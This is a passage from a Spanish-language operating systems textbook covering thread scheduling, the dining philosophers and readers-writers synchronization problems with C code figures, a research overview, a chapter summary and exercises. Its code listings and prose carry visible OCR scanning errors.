antes descritos acepta entrada de los procesos de usuario acerca de las decisiones de planificación. 
Como resultado, raras veces el planificador toma la mejor decisión. 

La solución a este problema es separar el mecanismo de planificación de la política de pla¬ 
nificación, un principio establecido desde hace tiempo (Levin y colaboradores, 1975). Esto signi¬ 
fica que el algoritmo de planificación está parametrizado de cierta forma, pero los procesos de 
usuario pueden llenar los parámetros. Consideremos el ejemplo de la base de datos una vez más. 
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Suponga que el kernel utiliza un algoritmo de planficación por prioridad, pero proporciona una lla¬ 
mada al sistema mediante la cual un proceso puede establecer (y modificar) las prioridades de sus 
hijos. De esta forma, el padre puede controlar con detalle la forma en que se planifican sus hijos, 
aun y cuando éste no se encarga de la planificación. Aquí el mecanismo está en el kemel, pero la 
política se establece mediante un proceso de usuario. 


2.4.6 Planificación de hilos 

Cuando varios procesos tienen múltiples hilos cada uno, tenemos dos niveles de paralelismo pre¬ 
sentes: procesos e hilos. La planificación en tales sistemas difiere en forma considerable, depen¬ 
diendo de si hay soporte para hilos a nivel usuario o para hilos a nivel kernel (o ambos). 

Consideremos primero los hilos a nivel usuario. Como el kernel no está consciente de la exis¬ 
tencia de los hilos, opera en la misma forma de siempre: selecciona un proceso, por decir A, y otor¬ 
ga a este proceso el control de su quántum. El planificador de hilos dentro de A decide cuál hilo 
ejecutar, por decir Al. Como no hay interrupciones de reloj para multiprogramar hilos, este hilo pue¬ 
de continuar ejecutándose todo el tiempo que quiera. Si utiliza todo el quántum del proceso, el ker¬ 
nel seleccionará otro proceso para ejecutarlo. 

Cuando el proceso A por fin se ejecute de nuevo, el hilo Al continuará su ejecución. Seguirá 
consumiendo todo el tiempo de A hasta que termine. Sin embargo, su comportamiento antisocial no 
afectará a los demás procesos. Estos recibirán lo que el planificador de procesos considere que es 
su parte apropiada, sin importar lo que esté ocurriendo dentro del proceso A. 

Ahora considere el caso en el que los hilos de A tienen relativamente poco trabajo que realizar 
por cada ráfaga de la CPU; por ejemplo, 5 mseg de trabajo dentro de un quántum de 50 mseg. En 
consecuencia, cada uno se ejecuta por unos instantes y después entrega la CPU al planificador de 
hilos. Esto podría producir la secuencia Al, A2,A3,A1,A2,A3,A1,A2,A3,A1 antes de que el ker¬ 
nel conmute al proceso B. Esta situación se ilustra en la figura 2-43(a). 

El algoritmo de planificación utilizado por el sistema en tiempo de ejecución puede ser cual¬ 
quiera de los antes descritos. En la práctica, los algoritmos de planificación por turno circular y de 
planificación por prioridad son los más comunes. La única restricción es la ausencia de un reloj pa¬ 
ra interrumpir a un proceso que se ha ejecutado por mucho tiempo. 

Ahora considere la situación con hilos a nivel kernel. Aquí el kernel selecciona un hilo especí¬ 
fico para ejecutarlo. No tiene que tomar en cuenta a cuál proceso pertenece el hilo, pero puede ha¬ 
cerlo si lo desea. El hilo recibe un quántum y se suspende obligatoriamente si se excede de este 
quántum. Con un quántum de 50 mseg pero hilos que se bloquean después de 5 mseg, el orden de 
los hilos para cierto periodo de 30 mseg podría ser Al, Bl, A2, B2, A3, B3, algo que no sería posi¬ 
ble con estos parámetros e hilos a nivel usuario. Esta situación se ilustra en forma parcial en la fi¬ 
gura 2-43(b). 

Una diferencia importante entre los hilos a nivel usuario y los hilos a nivel kernel es el rendimien¬ 
to. Para realizar un conmutación de hilos con hilos a nivel usuario se requiere de muchas instruccio¬ 
nes de máquina. Con hilos a nivel kemel se requiere una conmutación de contexto total, cambiar el 
mapa de memoria e invalidar la caché, lo cual es varias órdenes de magnitud más lento. Por otro la¬ 
do, con los hilos a nivel kemel, cuando un hilo se bloquea en espera de E/S no se suspende todo el 
proceso, como con los hilos a nivel usuario. 


SECCIÓN 2.5 PROBLEMAS CLÁSICOS DE COMUNICACIÓN ENTRE PROCESOS 163 


Orden en el que se 
ejecutan los hilos 


2. El sistema 
en tiempo 
de ejecución 
selecciona 
un hilo 


Proceso A 


Proceso B 



Proceso A Proceso B 



Posible: A1, A2, A3, Al, A2, A3 

Imposible: A1, B1, A2, B2, A3, B3 

(a) 


Posible: Al, A2, A3, A1, A2, A3 

También posible: A1, B1, A2, B2, A3, B3 

(b) 


Figura 2-43. (a) Posible planificación de hilos a nivel usuario con un quántum de 
50 mseg para cada proceso e hilos que se ejecutan durante 5 mseg por cada ráfaga de 
la CPU. (b) Posible planificación de hilos a nivel kemel con las mismas característi¬ 
cas que (a). 


Como el kernel sabe que es más costoso conmutar de un hilo en el proceso A a un hilo en el 
proceso B que ejecutar un segundo hilo en el proceso A (debido a que tiene que cambiar el mapa 
de memoria y se arruina la memoria caché), puede considerar esta información al tomar una deci¬ 
sión. Por ejemplo, dados dos hilos que son de igual importancia, en donde uno de ellos pertenece 
al mismo proceso que un hilo que se acaba de bloquear y el otro pertenece a un proceso distinto, 
se podría dar preferencia al primero. 

Otro factor importante es que los hilos a nivel usuario pueden emplear un planificador de hilos 
específico para la aplicación. Por ejemplo, considere el servidor Web de la figura 2-8. Suponga que 
un hilo trabajador acaba de bloquearse y que el hilo despachador así como dos hilos trabajadores 
están listos. ¿Quién debe ejecutarse a continuación? El sistema en tiempo de ejecución, que sabe lo 
que todos los hilos hacen, puede seleccionar fácilmente el despachador para que se ejecute a conti¬ 
nuación, de manera que pueda iniciar la ejecución de otro hilo trabajador. Esta estrategia maximi- 
za la cantidad de paralelismo en un entorno en el que los trabajadores se bloquean con frecuencia 
en la E/S de disco. Con los hilos a nivel kernel, el kernel nunca sabría lo que hace cada hilo (aun¬ 
que se les podría asignar distintas prioridades). Sin embargo, en general los planificadores de hilos 
específicos para la aplicación pueden optimizar mejor una aplicación de lo que el kernel puede. 


2.5 PROBLEMASCLÁSICOSDE COMUNICACIÓN 
ENTRE PROCESOS (IPC) 


La literatura de sistemas operativos está repleta de interesantes problemas que se han descrito y ana¬ 
lizado ampliamente, mediante el uso de una variedad de métodos de sincronización. En las siguien¬ 
tes secciones examinaremos tres de los problemas más conocidos. 
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2.5.1 EI problema de los filósofos comelones 

En 1965, Dijkstra propuso y resolvió un problema de sincronización al que llamó el problema de 
los filósofos cometones. Desde ese momento, todos los que inventaban otra primitiva de sincroni¬ 
zación se sentían obligados a demostrar qué tan maravillosa era esa nueva primitiva, al mostrar con 
qué elegancia resolvía el problema de los filósofos comelones. Este problema se puede enunciar 
simplemente de la siguiente manera. Cinco filósofos están sentados alrededor de una mesa circular. 
Cada filósofo tiene un plato de espagueti. El espagueti es tan resbaloso, que un filósofo necesita dos 
tenedores para comerlo. Entre cada par de platos hay un tenedor. La distribución de la mesa se ilus¬ 
tra en la figura 2-44. 



Figura 2-44. Hora de comer en el Departamento de Filosofía. 


La vida de un filósofo consiste en periodos alternos de comer y pensar (esto es algo así como 
una abstracción, incluso para los filósofos, pero las otras actividades son irrelevantes aquí). Cuan¬ 
do un filósofo tiene hambre, trata de adquirir sus tenedores izquierdo y derecho, uno a la vez, en 
cualquier orden. Si tiene éxito al adquirir dos tenedores, come por un momento, después deja los 
tenedores y continúa pensando. La pregunta clave es: ¿puede usted escribir un programa para cada 
filósofo, que haga lo que se supone debe hacer y nunca se trabe? (Hemos recalcado que el requeri¬ 
miento de los dos tenedores es algo artificial; tal vez deberíamos cambiar de comida italiana a co¬ 
mida china y sustituir el espagueti por arroz y los tenedores por palillos chinos). 

La figura 2-45 muestra la solución obvia. El procedimiento tomar_tenedor espera hasta que el 
tenedor específico esté disponible y luego lo toma. Por desgracia, la solución obvia está mal. Su¬ 
ponga que los cinco filósofos toman sus tenedores izquierdos al mismo tiempo. Ninguno podrá to¬ 
mar sus tenedores derechos y habrá un interbloqueo. 






SECCIÓN 2.5 PROBLEMAS CLÁSICOS DE COMUNICACIÓN ENTRE PROCESOS 


165 


#define N 5 


/* número de filósofos */ 


void filosofo(int i) 

{ 

while{TRUE){ 

pensarO; 
tomar_tenedor(i); 
tomar_tenedor((i+1) % N); 
comer(); 

poner_tenedor(i); 
poner_tenedor((i+1) % N); 

} 

} 


/* i: número de filósofo, de 0 a 4 7 


/* el filósofo está pensando 7 
/* toma tenedor izquierdo 7 
/* toma tenedor derecho; % es el operador módulo 7 
/* come espagueti 7 

/* pone tenedor izquierdo de vuelta en la mesa 7 
/* pone tenedor derecho de vuelta en la mesa 7 


Figura 2-45. Una solución incorrecta para el problema de los filósofos comelones. 


Podríamos modificar el programa de manera que después de tomar el tenedor izquierdo, el pro¬ 
grama compruebe para ver si el tenedor derecho está disponible. Si no lo está, el filósofo regresa el 
tenedor izquierdo, espera cierto tiempo y después repite todo el proceso. Esta proposición falla tam¬ 
bién, aunque por una razón distinta. Con un poco de mala suerte, todos los filósofos podrían iniciar 
el algoritmo en forma simultánea, tomarían sus tenedores izquierdos, verían que sus tenedores de¬ 
rechos no están disponibles, regresarían sus tenedores izquierdos, esperarían, volverían a tomar sus 
tenedores izquierdos al mismo tiempo y así en lo sucesivo, eternamente. Una situación como ésta, 
en la que todos los programas continúan ejecutándose en forma indefinida pero no progresan se co¬ 
noce como inanición (Starvation) (se llama inanición, aun cuando el problema no ocurre en un res¬ 
taurante italiano o chino). 

Ahora podríamos pensar que si los filósofos sólo esperan por un tiempo aleatorio en vez de es¬ 
perar durante el mismo tiempo al no poder adquirir el tenedor derecho, la probabilidad de que todo 
continúe bloqueado durante incluso una hora es muy pequeña. Esta observación es verdad y en ca¬ 
si todas las aplicaciones intentar de nuevo en un tiempo posterior no representa un problema. Por 
ejemplo, en la popular red de área local Ethernet, si dos computadoras envían un paquete al mismo 
tiempo, cada una espera durante un tiempo aleatorio e intenta de nuevo; en la práctica esta solución 
funciona bien. Sin embargo, en algunas cuantas aplicaciones sería preferible una solución que fun¬ 
cione siempre y que no pueda fallar debido a una serie improbable de números aleatorios. Piense 
acerca del control de la seguridad en una planta de energía nuclear. 

Una mejora a la figura 2-45 que no tiene interbloqueo ni inanición es proteger las cinco ins¬ 
trucciones que siguen de la llamada a pensar mediante un semáforo binario. Antes de empezar a ad¬ 
quirir tenedores, un filósofo realizaría una operación down en mutex. Después de regresar los 
tenedores, realizaría una operación up en mutex. Desde un punto de vista teórico, esta solución es 
adecuada. Desde un punto de vista práctico, tiene un error de rendimiento: sólo puede haber un fi¬ 
lósofo comiendo en cualquier instante. Con cinco tenedores disponibles, deberíamos poder permi¬ 
tir que dos filósofos coman al mismo tiempo. 

La solución que se presenta en la figura 2-46 está libre de interbloqueos y permite el máximo 
paralelismo para un número arbitrario de filósofos. Utiliza un arreglo llamado estado para llevar el 
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#define N 

#define IZQUIERDO 
#deflne DERECHO 
#deflne PENSANDO 
#deflne HAMBRIENTO 
#deflne COMIENDO 
typedef int semáforo; 

Int estado[N]; 
semáforo mutex = f; 
semáforo s[N]; 

void fllosofo(lnt I) 

{ 

whlle(TRUE){ 
pensarO; 
tomar_tenedores(l); 
comer(); 

poner_tenedores{l); 

} 

} 

void tomar_tenedores{int i) 

{ 

down(&mutex); 

estado[i] = HAMBRIENTO; 

probar{i); 

up(&mutex); 

down(&s[¡]); 

} 


5 

(i+N-f)%N 

(i+1)%N 

0 

f 

2 


/* número de filósofos 7 

/* número del vecino izquierdo de i 7 

/* número del vecino derecho de i 7 

/* el filósofo está pensando 7 

/* el filósofo trata de obtener los tenedores 7 

/* el filósofo está comiendo 7 

/* los semáforos son un tipo especial de int 7 

/* arreglo que lleva registro del estado de todos7 

/* exclusión mutua para las regiones críticas 7 

/* un semáforo por filósofo 7 

/* i: número de filósofo, de 0 a N-1 7 

/* se repite en forma indefinida 7 
/* el filósofo está pensando 7 
/* adquiere dos tenedores o se bloquea 7 
/* come espagueti 7 

/* pone de vuelta ambos tenedores en la mesa 7 


/* i: número de filósofo, de 0 a N-1 7 
/* entra a la región crítica 7 

/* registra el hecho de que el filósofo i está hambriento 7 
/* trata de adquirir 2 tenedores 7 
/* sale de la región crítica 7 
/* se bloquea si no se adquirieron los tenedores 7 


void poner_tenedores{i) /’ 

{ 

down(&mutex); /’ 

estado[i] = PENSANDO; /' 

probar{IZQUIERDO); /' 

probar{DERECHO); /' 

up(&mutex); /’ 

} 


i: número de filósofo, de 0 a N-1 7 

entra a la región crítica 7 

el filósofo terminó de comer 7 

verifica si el vecino izquierdo puede comer ahora 7 

verifica si el vecino derecho puede comer ahora 7 

sale de la región crítica 7 


void probar{i) /* i; número de filósofo, de 0 a N-1 7 

{ 

if (estado[i] == HAMBRIENTO && estado[IZQUIERDO] 1= COMIENDO && estado[DERECHO] != COMIENDO) { 
estado[i] = COMIENDO; 
up{&s[i]); 

} 

} 


Figura 2-46. Una solución al problema de los filósofos comelones. 
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registro de si un filósofo está comiendo, pensando o hambriento (tratando de adquirir tenedores). 
Un filósofo sólo se puede mover al estado de comer si ningún vecino está comiendo. Los i vecinos 
del filósofo se definen mediante las macros IZQUIERDO yDERECHO.En otras palabras, si I es 2, 
IZQUIERDO es 1 y DERECHO es 3. 

El programa utiliza un arreglo de semáforos, uno por cada filósofo, de manera que los filó¬ 
sofos hambrientos puedan bloquearse si los tenedores que necesitan están ocupados. Observe que 
cada proceso ejecuta el procedimiento filosofo como su código principal, pero los demás proce¬ 
dimientos (tomar_tenedores, poner_tenedores y probar) son ordinarios y no procesos separados. 


2.5.2 EI problema de los lectores y escritores 

El problema de los filósofos comelones es útil para modelar procesos que compiten por el acceso ex¬ 
clusivo a un número limitado de recursos, como los dispositivos de E/S. Otro problema famoso es el 
de los lectores y escritores (Courtois y colaboradores, 1971), que modela el acceso a una base de da¬ 
tos. Por ejemplo, imagine un sistema de reservación de aerolíneas, con muchos procesos en compe¬ 
tencia que desean leer y escribir en él. Es aceptable tener varios procesos que lean la base de datos 
al mismo tiempo, pero si un proceso está actualizando (escribiendo) la base de datos, ningún otro 
proceso puede tener acceso a la base de datos, ni siquiera los lectores. La pregunta es, ¿cómo se pro¬ 
graman los lectores y escritores? Una solución se muestra en la figura 2-47. 

En esta solución, el primer lector en obtener acceso a la base de datos realiza una operación 
down en el semáforo bd. Los siguientes lectores simplemente incrementan un contador llamado cl. 
A medida que los lectores van saliendo, decrementan el contador y el último realiza una operación 
up en el semáforo, para permitir que un escritor bloqueado (si lo hay) entre. 

La solución que se presenta aquí contiene en forma implícita una decisión sutil que vale la pe¬ 
na observar. Suponga que mientras un lector utiliza la base de datos, llega otro lector. Como no es 
un problema tener dos lectores al mismo tiempo, el segundo lector es admitido. También se pueden 
admitir más lectores, si es que llegan. 

Ahora suponga que aparece un escritor. Tal vez éste no sea admitido a la base de datos, ya que 
los escritores deben tener acceso exclusivo y por ende, el escritor se suspende. Más adelante apare¬ 
cen lectores adicionales. Mientras que haya un lector activo, se admitirán los siguientes lectores. 
Como consecuencia de esta estrategia, mientras que haya un suministro continuo de lectores, todos 
entrarán tan pronto lleguen. El escritor estará suspendido hasta que no haya un lector presente. Si 
llega un nuevo lector, por decir cada 2 segundos y cada lector requiere 5 segundos para hacer su tra¬ 
bajo, el escritor nunca entrará. 

Para evitar esta situación, el programa se podría escribir de una manera ligeramente distinta: 
cuando llega un lector y hay un escritor en espera, el lector se suspende detrás del escritor, en vez 
de ser admitido de inmediato. De esta forma, un escritor tiene que esperar a que terminen los lec¬ 
tores que estaban activos cuando llegó, pero no tiene que esperar a los lectores que llegaron des¬ 
pués de él. La desventaja de esta solución es que logra una menor concurrencia y por ende, un 
menor rendimiento. Courtois y sus colaboradores presentan una solución que da prioridad a los es¬ 
critores. Para obtener detalles, consulte la bibliografía. 
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typedef int semáforo; 
semáforo mutex=1; 
semáforo bd=1; 
int cl=0; 

void lector(void) 

{ 

while(TRUE){ 

down(&mutex); 
el = el + 1; 

if (el == 1) down(&bd); 

up{&mutex); 

leer_base_de_datos(); 

down(&mutex); 

el = el - 1; 

if (el == 0) up(&bd); 

up(&mutex); 

usar_leetura_datos(); 

} 

} 

void eseritor(void) 

{ 

while(TRUE){ 

pensar_datos(); 

down(&bd); 

eseribir_base_de_datos(); 

up(&bd); 

} 

} 


/* use su imaginaeión 7 

/* eontrola el aeeeso a ‘el’ 7 

/* eontrola el aeeeso a la base de datos */ 

/* # de proeesos que leen o desean haeerlo 7 


/* se repite de manera indefinida 7 
/* obtiene aeeeso exelusivo a ‘el’ 7 
/* ahora hay un leetor más 7 
/* si este es el primer leetor... 7 
/* libera el aeeeso exelusivo a ‘el’ 7 
/* aeeede a los datos */ 

/* obtiene aeeeso exelusivo a ‘el’ 7 
/* ahora hay un leetor menos 7 
/* si este es el último leetor... 7 
/* libera el aeeeso exelusivo a ‘el’ 7 
/* región no erítiea 7 


/* se repite de manera indefinida 7 
/* región no erítiea 7 
/* obtiene aeeeso exelusivo 7 
/* aetualiza los datos */ 

/* libera el aeeeso exelusivo 7 


Figura 2-47. Una solución al problema de los lectores y escritores. 


2.6INVESTIGACIÓN ACERCA DE LOSPROCESOSE HILOS 

En el capítulo 1 analizamos parte de la investigación actual acerca de la estructura de los sistemas 
operativos. En este capítulo y otros, veremos una investigación con enfoque más específico, empe¬ 
zando con los procesos. Como se aclarará con el tiempo, algunos temas están más asentados que 
otros. La mayor parte de la investigación tiende a estar en los nuevos temas, en vez de los que ya 
han estado presentes por décadas. 

El concepto de un proceso es un ejemplo de algo que está bastante bien asentado. Casi todo sis¬ 
tema tiene cierta noción de un proceso como contenedor para agrupar recursos relacionados como 
un espacio de direcciones, hilos, archivos abiertos, permisos de protección, etcétera. Los distintos 
sistemas realizan estos agrupamientos en formas ligeramente diferentes, pero éstas son sólo dife¬ 
rencias de ingeniería. La idea básica ya no es muy controversia! y hay poca investigación en cuan¬ 
to al tema de los procesos. 
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Los hilos son una idea más reciente que los procesos, pero también han estado presentes por un 
buen tiempo. Aún así, de vez en cuando aparece un artículo ocasional acerca de los hilos, por ejem¬ 
plo, acerca de la agrupamientos de hilos en multiprocesadores (Tam y colaboradores, 2007) o esca¬ 
lando el número de hilos en un proceso a 100,000 (Von Behren y colaboradores, 2003). 

La sincronización de procesos es un tema bastante establecido hoy en día, pero aún así de vez 
en cuando se presenta algún artículo, como uno acerca del procesamiento concurrente sin candados 
(Fraser y Harris, 2007) o la sincronización sin bloqueo en los sistemas de tiempo real (Hohmuth y 
Haertig, 2001). 

La planificación de procesos (tanto en uniprocesadores como en multiprocesadores) sigue 
siendo un tema cercano y querido para algunos investigadores. Algunos temas que se están inves¬ 
tigando incluyen la planificación con eficiencia de energía en dispositivos móviles (Yuan y Nahrs- 
tedt, 2006), la planificación con capacidad para hiperhilamiento (Bulpin y Pratt, 2005), qué hacer 
cuando la CPU estaría inactiva en cualquier otro caso (Eggert y Touch, 2005) y la planificación 
del tiempo virtual (Nieh y colaboradores, 2001). Sin embargo, hay pocos diseñadores de sistemas 
en la actualidad en busca de un algoritmo decente de planificación de hilos, por lo que parece ser 
que este tipo de investigación es más por interés del investigador que por verdadera demanda. Con 
todo, los procesos, hilos y la planificación de los mismos no son temas de tanto interés como an¬ 
tes fueron. La investigación ha avanzado a otras áreas. 


2.7RESUMEN 

Para ocultar los efectos de las interrupciones, los sistemas operativos proporcionan un modelo con¬ 
ceptual que consiste en procesos secuenciales ejecutándose en paralelo. Los procesos se pueden 
crear y terminar en forma dinámica. Cada proceso tiene su propio espacio de direcciones. 

Para algunas aplicaciones es conveniente tener varios hilos de control dentro de un solo proce¬ 
so. Estos hilos se planifican de manera independiente y cada uno tiene su propia pila, pero todos los 
hilos en un proceso comparten un espacio de direcciones común. Los hilos se pueden implementar 
en espacio de usuario o en el de kernel. 

Los procesos se pueden comunicar entre sí mediante el uso de las primitivas de comunicación 
entre procesos, como semáforos, monitores o mensajes. Estas primitivas se utilizan para asegurar 
que no haya dos procesos en sus regiones críticas al mismo tiempo, una situación que produce un 
caos. Un proceso puede estar en ejecución, listo para ejecutarse o bloqueado, pudiendo cambiar de 
estado cuando éste u otro proceso ejecute una de las primitivas de comunicación entre procesos. La 
comunicación entre hilos es similar. 

Las primitivas de comunicación entre procesos se pueden utilizar para resolver problemas ta¬ 
les como el del productor-consumidor, los filósofos comelones y el de los lectores y escritores. Aún 
con estas primitivas, hay que tener cuidado para evitar errores e interbloqueos. 

Se han estudiado muchos algoritmos de planificación. Algunos de ellos se utilizan principal¬ 
mente para sistemas de procesamiento por lotes, como la planificación del trabajo más corto prime¬ 
ro. Otros son comunes tanto en los sistemas de procesamiento por lotes como en los sistemas 
interactivos. Estos algoritmos incluyen el de planificación por turno circular, por prioridad, colas de 
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multiniveles, planificación garantizada, planificación por lotería y planificación por partes equitati¬ 
vas. Algunos sistemas hacen una clara separación entre el mecanismo de planificación y la política 
de planificación, lo cual permite a los usuarios tener control del algoritmo de planificación. 


PROBLEMAS 

1. En la figura 2-2 se muestran los estados de tres procesos. En teoría, con tres estados podría haber 
seis transiciones, dos fuera de cada estado. Sin embargo sólo se muestran cuatro transiciones. ¿Exis¬ 
te alguna circunstancia en la que una o ambas de las transiciones faltantes pudiera ocurrir? 

2. Suponga que debe diseñar una arquitectura de computadora avanzada que hiciera conmutación de 
procesos en el hardware, en vez de tener interrupciones. ¿Qué información necesitaría la CPU? Des¬ 
criba cómo podría trabajar la conmutación de procesos por hardware. 

3. En todas las computadoras actuales, al menos una parte de los manejadores de interrupciones se es¬ 
criben en lenguaje ensamblador. ¿Por qué? 

4. Cuando una interrupción o una llamada al sistema transfiere el control al sistema operativo, por lo 
general se utiliza un área de la pila del kernel separada de la pila del proceso interrumpido. ¿Por 
qué? 

5. Varios trabajos se pueden ejecutar en paralelo y terminar con más rapidez que si se hubieran ejecu¬ 
tado en secuencia. Suponga que dos trabajos, cada uno de los cuales necesita 10 minutos de tiempo 
de la CPU, inician al mismo tiempo. ¿Cuánto tiempo tardará el último en completarse, si se ejecu¬ 
tan en forma secuencial? ¿Cuánto tiempo si se ejecutan en paralelo? Suponga que hay 50% de es¬ 
pera de E/S. 

6 . En el texto se estableció que el modelo de la figura 2-11 (a) no era adecuado para un servidor de ar¬ 
chivos que utiliza una memoria caché. ¿Por qué no? ¿Podría cada proceso tener su propia caché? 

7. Si un proceso con multihilamiento utiliza la operación fork, ocurre un problema si el hijo obtiene co¬ 
pias de todos los hilos del padre. Suponga que uno de los hilos originales estaba esperando la entra¬ 
da del teclado. Ahora hay dos hilos esperando la entrada del teclado, uno en cada proceso. ¿Acaso 
ocurre este problema en procesos con un solo hilo? 

8 . En la figura 2-8 se muestra un servidor Web con multihilamiento. Si la única forma de leer un archi¬ 
vo es la llamada al sistema read normal con bloqueo, ¿cree usted que se están usando hilos a nivel 
usuario o hilos a nivel kernel para el servidor Web? ¿Por qué? 

9. En el texto describimos un servidor Web con multihilamiento, mostrando por qué es mejor que un 
servidor con un solo hilo y que un servidor de máquina de estados finitos. ¿Hay alguna circunstan¬ 
cia en la cual un servidor con un solo hilo podría ser mejor? Dé un ejemplo. 

10. En la figura 2-12, el conjunto de registros se lista por hilos, en vez de por procesos. ¿Por qué? Des¬ 
pués de todo, la máquina sólo tiene un conjunto de registros. 

11. ¿Por qué un hilo otorgaría de manera voluntaria la CPU al llamar a thread_yield? Después de todo, 
como no hay una interrupción periódica de reloj, tal vez nunca obtenga la CPU de vuelta. 

12. ¿Puede darse alguna vez el apropiamiento de un hilo mediante una interrupción de reloj? De ser así, 
¿bajo qué circunstancias? Si no es así, ¿por qué no? 
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13. En este problema debe comparar la lectura de un archivo, utilizando un servidor de archivos con un 
solo hilo y un servidor multihilado. Se requieren 15 mseg para obtener una petición, despacharla y 
realizar el resto del procesamiento necesario, suponiendo que los datos necesarios están en la caché 
del bloque. Si se necesita una operación de disco, como es el caso una tercera parte del tiempo, se 
requieren 75 mseg adicionales, durante los cuales el hilo duerme. ¿Cuántas peticiones por segundo 
puede manejar el servidor, si es de un solo hilo? ¿Si es multihilado? 

14. ¿Cuál es la mayor ventaja de implementar hilos en espacio de usuario? ¿Cuál es la mayor desven¬ 
taja? 

15. En la figura 2-15, las creaciones de hilos y los mensajes impresos por los mismos se intercalan al 
azar. ¿Hay alguna forma de forzar el orden para que sea estrictamente: hilo 1 creado, hilo 1 impri¬ 
me mensaje, hilo 1 termina, hilo 2 creado, hilo 2 imprime mensaje, hilo 2 termina, y así en lo suce¬ 
sivo? De ser así, ¿cómo se puede hacer? Si no es así, ¿por qué no? 

16. En el análisis de las variables globales en hilos, utilizamos un procedimiento llamado crear giobal 
para asignar espacio para un apuntador a la variable, en vez de la misma variable. ¿Es esto esencial 
o podrían trabajar los procedimientos con los valores en sí mismos de igual forma? 

17. Considere un sistema en el cual los hilos se implementan por completo en espacio de usuario, en 
donde el sistema en tiempo de ejecución obtiene una interrupción de reloj una vez por segundo. Su¬ 
ponga que ocurre una interrupción de reloj mientras un hilo se ejecuta en el sistema en tiempo de 
ejecución. ¿Qué problema podría ocurrir? ¿Puede usted sugerir una forma de resolverlo? 

18. Suponga que un sistema operativo no tiene algo parecido a la llamada al sistema select para ver por 
adelantado si es seguro leer de un archivo, canal o dispositivo, pero que sí permite establecer relo¬ 
jes de alarma que interrumpen las llamadas bloqueadas al sistema. ¿Es posible implementar un pa¬ 
quete de hilos en espacio de usuario bajo estas condiciones? Explique. 

19. ¿Puede el problema de inversión de prioridades que vimos en la sección 2.3.4 ocurrir con hilos a ni¬ 
vel usuario? ¿Por qué si o por qué no? 

20. En la sección 2.3.4 se describió una situación con un proceso de alta prioridad H y un proceso de ba¬ 
ja prioridad L, que ocasionaba que H iterara en forma indefinida. ¿Ocurre el mismo problema si se 
utiliza la planificación por turno circular en vez de la planificación por prioridad? Explique. 

21. En un sistema con hilos, ¿hay una pila por cada hilo o una pila por cada proceso cuando se utilizan 
hilos a nivel usuario? ¿y cuando se utilizan hilos a nivel de kernel? Explique. 

22. Cuando se está desarrollando una computadora, por lo general primero se simula mediante un pro¬ 
grama que ejecuta una instrucción a la vez. Incluso hasta los multiprocesadores se simulan estricta¬ 
mente en forma secuencial como ésta. ¿Es posible que ocurra una condición de carrera cuando no 
hay eventos simultáneos como éste? 

23. ¿Funciona la solución de espera ocupada en la que se utiliza la variable turno (figura 2-23) cuando 
los dos procesos se ejecutan en un multiprocesador con memoria compartida, es decir, dos CPU que 
comparten una memoria común? 

24. La solución de Peterson al problema de exclusión mutua que se muestra en la figura 2-24, ¿funcio¬ 
na cuando la planificación es apropiativa? ¿Y qué pasa cuando es no apropiativa? 

25. Dé un bosquejo acerca de cómo un sistema operativo que puede deshabilitar interrupciones podría 
implementar semáforos. 
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26. Muestre cómo pueden implementarse los semáforos contadores (es decir, semáforos que pueden 
contener un valor arbitrario) utilizando sólo semáforos binarios e instrucciones de máquina ordina¬ 
rias. 

27. Si un sistema sólo tiene dos procesos, ¿tiene sentido utilizar una barrera para sincronizarlos? ¿Por 
qué sí o por qué no? 

28. ¿Pueden dos hilos en el mismo proceso sincronizarse mediante un semáforo de kernel, si los hilos 
son implementados por el kernel? ¿Qué pasa si se implementan en espacio de usuario? Suponga que 
ningún hilo de ningún otro proceso tiene acceso al semáforo. Analice sus respuestas. 

29. La sincronización con monitores utiliza variables de condición y dos operaciones especiales: wait y 
signal. Una forma más general de sincronización tendría que tener una sola primitiva, waituntil, que 
tuviera un predicado booleano arbitrario como parámetro. Así, podríamos decir por ejemplo: 

waituntil x<0oy + z<n 

La primitiva signal no sería ya necesaria. Es evidente que este esquema es más general que el de 
Hoare o Brinch Hansen, pero no se utiliza. ¿Por qué no? Sugerencia: Considere la implementación. 

30. Un restaurante de comida rápida tiene cuatro tipos de empleados: (1) los que toman pedidos de los 
clientes; (2) los cocineros, que preparan la comida; (3) los especialistas de empaquetado, que meten 
la comida en bolsas; y (4) los cajeros, que entregan las bolsas a los clientes y reciben su dinero. Ca¬ 
da empleado puede considerarse como un proceso secuencial comunicativo. ¿Qué forma de comu¬ 
nicación entre procesos utilizan? Relacione este modelo con los procesos en UNIX. 

31. Suponga que tenemos un sistema de paso de mensajes que utiliza buzones. Al enviar a un buzón lle¬ 
no o al tratar de recibir de uno vacío, un proceso no se bloquea. En vez de ello, recibe de vuelta un 
código de error. Para responder al código de error, el proceso sólo vuelve a intentar, una y otra vez, 
hasta tener éxito. ¿Produce este esquema condiciones de carrera? 

32. Las computadoras CDC 6000 podían manejar hasta 10 procesos de E/S en forma simultánea, utili¬ 
zando una forma interesante de planificación por tumo circular conocida como COm partición dei 
procesador. Se llevaba a cabo una conmutación de procesos después de cada instracción, por lo que 
la instrucción 1 provenía del proceso 1, la instrucción 2 del proceso 2, etcétera. La conmutación de 
procesos se realizaba mediante hardware especial y la sobrecarga era de cero. Si un proceso necesi¬ 
taba T segundos para completarse en ausencia de competencia, ¿cuánto tiempo necesitaría si se uti¬ 
lizara la compartición del procesador con n procesos? 

33. ¿Puede una medida determinar, analizando el código fuente, si un proceso es más probable que es¬ 
té limitado a CPU o limitado a E/S? ¿Cómo puede determinarse esto en tiempo de ejecución? 

34. En la sección “Cuándo se deben planificar” se mencionó que algunas veces la planificación se po¬ 
dría mejorar si un proceso importante pudiera desempeñar un papel al seleccionar el siguiente pro¬ 
ceso a ejecutar al bloquearse. Mencione una situación en la que se podría utilizar esto y explique 
cómo. 

35. Las mediciones de cierto sistema han demostrado que el proceso promedio se ejecuta durante un 
tiempo T antes de bloquearse debido a una operación de E/S. Una conmutación de procesos requie¬ 
re de un tiempo S, es efectivamente desperdiciado (sobrecarga). Para la planificación por turno cir¬ 
cular con un quántum Q, proporcione una fórmula para la eficiencia de la CPU en cada uno de los 
siguientes casos; 
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(a) Q = oo 

(b) Q >T 

(c) S < Q < T 

(d) Q = S 

(e) Q cercano a 0 

36. Hay cinco trabajos en espera de ser ejecutados. Sus tiempos de ejecución esperados son 9, 6, 3, 5 y 
X. ¿En qué orden se deben ejecutar para minimizar el tiempo de respuesta promedio? (Su respues¬ 
ta dependerá de X). 

37. Cinco trabajos de procesamiento por lotes, A a E, llegan a un centro de cómputo casi al mismo tiem¬ 
